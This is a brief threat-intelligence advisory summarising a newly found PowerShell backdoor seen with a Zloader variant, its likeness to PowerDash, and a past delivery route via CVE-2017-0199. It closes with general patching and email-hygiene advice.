Summary:
Walmart’s Cyber Intelligence Team has discovered an unknown PowerShell backdoor alongside a new variant of the Zloader/SilentNight malware. The PowerShell backdoor is designed to provide actors further access through reconnaissance activities and deploy additional malware. Researchers note that the backdoor shares similarities with a previously observed PowerShell malware called PowerDash, particularly the way they both build the system data to send to the command and control (C2) infrastructure and how they use the same obfuscation techniques to hide the more important components of the backdoor. As of writing, only a few samples of newly discovered PowerShell backdoor are available on VirusTotal, making detection more challenging.

Security Officer Comments:
PowerShell scripts are typically used by threat actors to evade detection and download additional malware. Notably, the threat intelligence team at Walmart found heavily obfuscated code sections in the new PowerShell backdoor, which were further extracted and analyzed. One of these code blobs was an anti-virtual machine check, designed to thwart analysis by researchers. A second code block was also identified designed prepare information to be sent to the C2 server and respond to commands issued.

While Walmart was not specifically targeted in the latest campaign, the company noted that new PowerShell backdoor was potentially utilized in attacks alongside Zloader, a modular malware trojan that has been linked to a number of Russian ransomware-as-a-service groups over the years, including Ryuk, DarkSide and Black Basta.

Suggested Corrections:
The exact method of distribution of the latest PowerShell backdoor was not disclosed. In the past, similar malware like PowerDash have been deployed in malspam messages containing malicious .doc attachments. Particularly, the attached documents attempted to exploit a relatively old Microsoft Office/WordPad RCE vulnerability CVE-2017-0199 for propagation. To prevent similar infections, users should regularly update software for known vulnerabilities like CVE-2017-0199, avoid linking on malicious links or attachments from unknown senders, and install antivirus software.

Link(s):
https://www.infosecurity-magazine.com/news/walmart-powershell-backdoor-zloader/